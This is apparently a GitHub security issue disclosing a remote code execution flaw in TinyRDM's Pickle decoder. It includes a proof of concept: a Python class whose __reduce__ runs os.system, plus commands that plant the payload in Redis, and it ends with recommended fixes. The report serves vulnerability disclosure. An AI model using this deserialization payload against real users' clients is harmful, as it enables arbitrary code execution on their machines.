[Security BUG] TinyRDM Pickle Decoder RCE

**Tiny RDM Version**
v1.2.5

**OS Version**
Mac/Windows/Linux

**Redis Version**
latest

**Describe the bug**

TinyRDM ships with a builtin “Pickle” decoder that invokes `pickle.loads` on the TinyRDM host whenever a user explicitly selects Pickle decoding in the value viewer. Because Python pickle is inherently unsafe for untrusted input, an attacker controlling Redis data can achieve arbitrary code execution on the user’s machine simply by getting the user to inspect the malicious key and choose Pickle decoding in TinyRDM.

- **Affected components**  
  pickle_convert.go creates `pickle_decoder.py` and runs `pickle.loads(decoded)` without isolation. browser_service.go calls `convutil.ConvertTo` for key values when the user requests Pickle decoding.

- **Impact**  
  Remote code execution with the privileges of the TinyRDM desktop user. Any Redis server that a user connects to can deliver a pickle payload; viewing the key triggers arbitrary command execution on the client machine.

- **Proof of Concept**

  1. Generate malicious pickle payload (touches `/tmp/hacked-by-zznq` on the TinyRDM host):

    ```python3
    # poc.py
    import pickle
    import os


    class RCE:
        def __reduce__(self):
            return (os.system, ("touch /tmp/hacked-by-zznq",))


    with open("payload.pkl", "wb") as f:
        f.write(pickle.dumps(RCE()))
    ```

    ```bash
    python3 poc.py   # writes payload.pkl
    ```

  2. Start Redis (example):

    ```bash
    docker run --rm -p 6379:6379 --name tinyrdm-redis redis:latest
    docker cp payload.pkl tinyrdm-redis:/tmp/payload.pkl
    docker exec tinyrdm-redis sh -c 'redis-cli -x LPUSH evil_poc:list </tmp/payload.pkl'
    ```

  3. In TinyRDM, connect to the Redis instance and open key `evil_poc`. Choose decode values with "Pickle".
  4. As soon as the value viewer loads, [PickleConvert::Decode](https://github.com/tiny-craft/tiny-rdm/blob/main/backend/utils/convert/pickle_convert.go#L107) executes on the host and creates `/tmp/hacked-by-zznq`, proving code execution.

<img height="800" alt="Image" src="https://github.com/user-attachments/assets/f44b46e0-d414-438b-baad-1d3032e89682" />

- **Technical Details**  
  - When the user selects `decode=Pickle`, `convutil.ConvertTo` goes straight to `pickleConv.Decode`, spawning a local Python interpreter and running `pickle.loads`.  
  - List/Hash/Set/.. viewers call `ConvertTo` when the user changes the Decode dropdown, so payloads embedded in non-string key types can also trigger execution.

- **Recommended Fixes**  
  1. Require explicit opt-in with a prominent warning, or disable it entirely.  
  2. If pickle support must remain, run the helper in a sandbox (container, seccomp) and deserialize with a restricted, schema-checked parser rather than `pickle.loads`.  


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

[Security BUG] TinyRDM Pickle Decoder RCE #512

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

[Security BUG] TinyRDM Pickle Decoder RCE #512

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions